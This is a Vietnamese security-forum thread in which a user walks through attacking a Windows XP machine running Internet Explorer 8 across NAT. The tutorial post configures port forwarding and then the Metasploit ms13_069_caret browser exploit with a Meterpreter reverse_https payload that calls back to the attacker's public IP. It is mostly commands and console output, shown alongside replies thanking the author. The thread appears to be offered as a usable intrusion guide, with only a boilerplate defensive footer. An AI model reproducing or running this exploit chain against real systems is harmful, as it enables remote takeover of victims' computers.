Hướng dẫn hacking một máy tính thông qua Internet

Thảo luận trong 'Audit/Pentest Security' bắt đầu bởi Hackerstudent93, 03/12/15, 10:12 PM.

 1. Hackerstudent93

  Hackerstudent93 VIP Members

  Tham gia: 30/09/13, 12:09 AM
  Bài viết: 343
  Đã được thích: 37
  Điểm thành tích:
  38
  Hi all,

  Hôm nay mình đã trờ lại, và trong bài viết nhở này chúng ta sẽ xem xét làm thế nào để cấu hình một cách chính xác Meterpreter Payload và làm chúng hoạt động khi tấn công của bạn là phía sau NAT. Thậm chí nếu cả 2 mục tiêu là: hacker và nạn nhân đều phía sau NAT. Có lẽ tôi sẽ khai thác một trình duyệt để chứng minh điều này.

  Mô hình:

  [​IMG]  Như các bạn có thể nhìn thấy. Cả hacker và nạn nhân là phía sau NAT, làm thế nào để đột nhập vào máy này bây giờ ???
   
  Last edited by a moderator: 03/12/15, 10:12 PM
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 2. Hackerstudent93

  Hackerstudent93 VIP Members

  Tham gia: 30/09/13, 12:09 AM
  Bài viết: 343
  Đã được thích: 37
  Điểm thành tích:
  38
  Hello everyone :)
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 3. sunny

  sunny VIP Members

  Tham gia: 30/06/14, 10:06 PM
  Bài viết: 1,828
  Đã được thích: 860
  Điểm thành tích:
  113
  Bài hay, thanks
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 4. duc_2712

  duc_2712 W-------

  Tham gia: 22/04/14, 06:04 AM
  Bài viết: 19
  Đã được thích: 2
  Điểm thành tích:
  18
  Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 5. Hackerstudent93

  Hackerstudent93 VIP Members

  Tham gia: 30/09/13, 12:09 AM
  Bài viết: 343
  Đã được thích: 37
  Điểm thành tích:
  38
  Tiếp theo:
  Chúng ta sẽ giả định rằng đối phương có khả khả năng kết nối đến Internet qua Port 80 và 443
  Tôi sẽ sử dụng Kali Linux như những kẻ tấn công, Metasploit thì đã có sẵn trên kali linux. Vui lòng chắc rằng bạn đã cập nhật Metasploit phiên bản mới nhất trên Kali Linux.
  Tôi sẽ khác thác trình duyệt Inetnet Explorer 8 vì nó đã lỗi thời và chứa rất nhiều lỗ hỏng bảo mật dễ bị tấn công :)
  Ý tưởng là để cấu hình Router/Firewall để traffic tới các IP Public (1.1.1.1) của Router sẽ được forward đến IP Hacker (192.168.0.187) trên các cổng 80 và 443. Vui lòng chắc chắn để kiểm tra xem cổng 80 và 443 không được sử dụng bởi Router/Firewall.

  Đầu tiên chúng ta cần xác minh rằng forwarding đang làm việc.
  Trên Kali tạo một tập tin hmtl nhở và lưu nó dưới /tmp
  Mã:
  [email protected]:~# cd /tmp
  [email protected]:/tmp# echo "It works" > test.html
  
  Từ thư mục chứa các file test.html chạy lệnh python này.

  Mã:
  [email protected]:/tmp# python -m SimpleHTTPServer 443
  Serving HTTP on 0.0.0.0 port 443 ...
  192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /test.html HTTP/1.1" 200 -
  192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
  192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
  192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
  192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
  
  
  Nếu bây giờ bạn kết nối đến http://192.168.1.26:443/test.html bạn sẽ thấy:  Bây giờ. Trên một máy tính bất kỳ ngoài Inetnet gõ http://1.1.1.1/test.html ( thay IP 1.1.1.1 bằng IP Public của bạn ) nếu bạn nhìn thấy trang này chứng tở forwarding đã được cấu hình chính xác và đang làm việc tốt. nếu không bạn cần kiểm tra lại cấu hình forwarding . Hướng dẫn cấu hình nằm ngoài phạm vi bài viết tôi để cho các bạn tự tìm hiểu ;)

  Lưu ý: forwarding thì đang làm việc chính xác cho cả 2 cổng 80 và 443. test thêm điều này.

  Mã:
  [email protected]:~# cd /tmp
  [email protected]:/tmp# python -m SimpleHTTPServer 80
  Serving HTTP on 0.0.0.0 port 80 ...
  192.168.1.26 - - [04/Dec/2015 11:01:15] "GET /test.html HTTP/1.1" 200 -
  
  
  Metasploit Configruration

  Tôi sẽ sử dụng ms13_069_caret.rb để khai thác.

  Mã:
  msf > use exploit/windows/browser/ms13_069_caret
  msf exploit(ms13_069_caret) > show options
  
  Module options (exploit/windows/browser/ms13_069_caret):
  
    Name   Current Setting Required Description
    ----   --------------- -------- -----------
    SRVHOST 0.0.0.0     yes    The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT 8080       yes    The local port to listen on.
    SSL   false      no    Negotiate SSL for incoming connections
    SSLCert          no    Path to a custom SSL certificate (default is randomly generated)
    URIPATH          no    The URI to use for this exploit (default is random)
  
  
  Exploit target:
  
    Id Name
    -- ----
    0  IE 8 on Windows XP SP3
  
  
  msf exploit(ms13_069_caret) > set SRVPORT 80
  SRVPORT => 80
  msf exploit(ms13_069_caret) > set URIPATH /
  URIPATH => /
  msf exploit(ms13_069_caret) >
  
  Kế tiếp chúng ta sẽ lựa chọn meterpreter reverse_https payload for windows. Chạy show options một lần nữa và chúng ta sẽ nhìn thấy điều này.

  Mã:
  msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
  payload => windows/meterpreter/reverse_https
  msf exploit(ms13_069_caret) > show options
  
  Module options (exploit/windows/browser/ms13_069_caret):
  
    Name   Current Setting Required Description
    ----   --------------- -------- -----------
    SRVHOST 0.0.0.0     yes    The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT 80        yes    The local port to listen on.
    SSL   false      no    Negotiate SSL for incoming connections
    SSLCert          no    Path to a custom SSL certificate (default is randomly generated)
    URIPATH /        no    The URI to use for this exploit (default is random)
  
  
  Payload options (windows/meterpreter/reverse_https):
  
    Name   Current Setting Required Description
    ----   --------------- -------- -----------
    EXITFUNC process     yes    Exit technique (Accepted: ', seh, thread, process, none)
    LHOST           yes    The local listener hostname
    LPORT   8443       yes    The local listener port
  
  
  Exploit target:
  
    Id Name
    -- ----
    0  IE 8 on Windows XP SP3
  
  
  msf exploit(ms13_069_caret) >
  
  msf exploit(ms13_069_caret) > set LPORT 443
  LPORT => 443
  msf exploit(ms13_069_caret) > set LHOST 1.55.109.2. ( YOUR IP PUBLIC)
  LHOST => 1.1.1.1
  Mã:
  Chúng ta có thể nói cho nó biết để lắng nghe trên IP LAN
  
  [CODE]
  msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.1.26
  ReverseListenerBindAddress => 192.168.1.26
  
  
  Mã:
  msf exploit(ms13_069_caret) > exploit
  [*]Exploit running as background job.
  [*]Started HTTPS reverse handler on https://192.168.1.26:443/
  [*]Using URL: http://0.0.0.0:80/
  [*]Local IP: http://192.168.1.26:80/
  [*]Server started.
  msf exploit(ms13_069_caret) >
  
  Nếu bây giờ chúng ta sử dụng IE 8 trên máy nạn nhân và kết nối với IP Public của Hacker. Chúng ta sẽ thấy điều này.

  Mã:
  msf exploit(ms13_069_caret) >
  [*]2.2.2.2  ms13_069_caret - Sending exploit...
  [*]2.2.2.2  ms13_069_caret - Sending exploit...
  [*]2.2.2.2:53893 Request received for /NtFT...
  [*]2.2.2.2:53893 Staging connection for target /NtFT received...
  [*]Patched user-agent at offset 663128...
  [*]Patched transport at offset 662792...
  [*]Patched URL at offset 662856...
  [*]Patched Expiration Timeout at offset 663728...
  [*]Patched Communication Timeout at offset 663732...
  
  Note:

  SRVHOST : 0.0.0.0
  SRVPORT : set to the port where you want to host the browser exploit
  LHOST : the attacker public IP
  LPORT : set to the port where you want to serve the Meterpreter handler
  ReverseListenerBindAddress : LAN IP (optional)

  Screenshot from 2015-12-04 10:29:46.jpg
   

  Các file đính kèm:

  Last edited by a moderator: 28/05/20, 10:05 AM
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 6. Hackerstudent93

  Hackerstudent93 VIP Members

  Tham gia: 30/09/13, 12:09 AM
  Bài viết: 343
  Đã được thích: 37
  Điểm thành tích:
  38
  Mệt rồi! Tạm thời tôi đi ngủ cái đã. mai rảnh sẽ xem lại có bị hoat mắt gõ sai chỗ nào không ;)
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 7. Hackerstudent93

  Hackerstudent93 VIP Members

  Tham gia: 30/09/13, 12:09 AM
  Bài viết: 343
  Đã được thích: 37
  Điểm thành tích:
  38
  Bạn có thể tham khảo bài viết của mình ở trên nhé. Nhưng bạn đã làm đồ án thành công trên win xp và win 7 nhờ hướng dẫn của mình. Mình đang tò mò là không biết bài nào nhỉ ? trên diễn đàn có rất nhiều bài của mình ;)
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 8. vequeemnhe

  vequeemnhe Wh------

  Tham gia: 29/06/15, 08:06 PM
  Bài viết: 63
  Đã được thích: 19
  Điểm thành tích:
  18
  Bài này good Thanks...........................
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 9. 4fingers

  4fingers W-------

  Tham gia: 23/11/15, 01:11 PM
  Bài viết: 13
  Đã được thích: 6
  Điểm thành tích:
  8
  cần lắm một bài hướng dẫn chất lượng :)
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 10. duc_2712

  duc_2712 W-------

  Tham gia: 22/04/14, 06:04 AM
  Bài viết: 19
  Đã được thích: 2
  Điểm thành tích:
  18

  Bài này bác ơi
  https://whitehat.vn/forum/thao-luan...ong-dan-hack-win-7-loi-ms11-46-voi-metasploit
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 11. tieulyit

  tieulyit W-------

  Tham gia: 10/12/15, 02:12 PM
  Bài viết: 5
  Đã được thích: 0
  Điểm thành tích:
  1
  Sao mình k thấy link hay bài hướng dẫn gì hết mà bạn.
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 12. Hackerstudent93

  Hackerstudent93 VIP Members

  Tham gia: 30/09/13, 12:09 AM
  Bài viết: 343
  Đã được thích: 37
  Điểm thành tích:
  38
  Bài hướng dẫn của mình ở trên rồi mà. Bạn muốn hỏi link hay bài hướng dẫn nào mới được ? :)
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 13. luongtankhang123

  luongtankhang123 W-------

  Tham gia: 02/07/13, 09:07 PM
  Bài viết: 47
  Đã được thích: 14
  Điểm thành tích:
  18
  Điều kiện hoàn hảo tuyệt đối: IE
  Imposible :D
  Bài viết hay, thanks bác :D
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan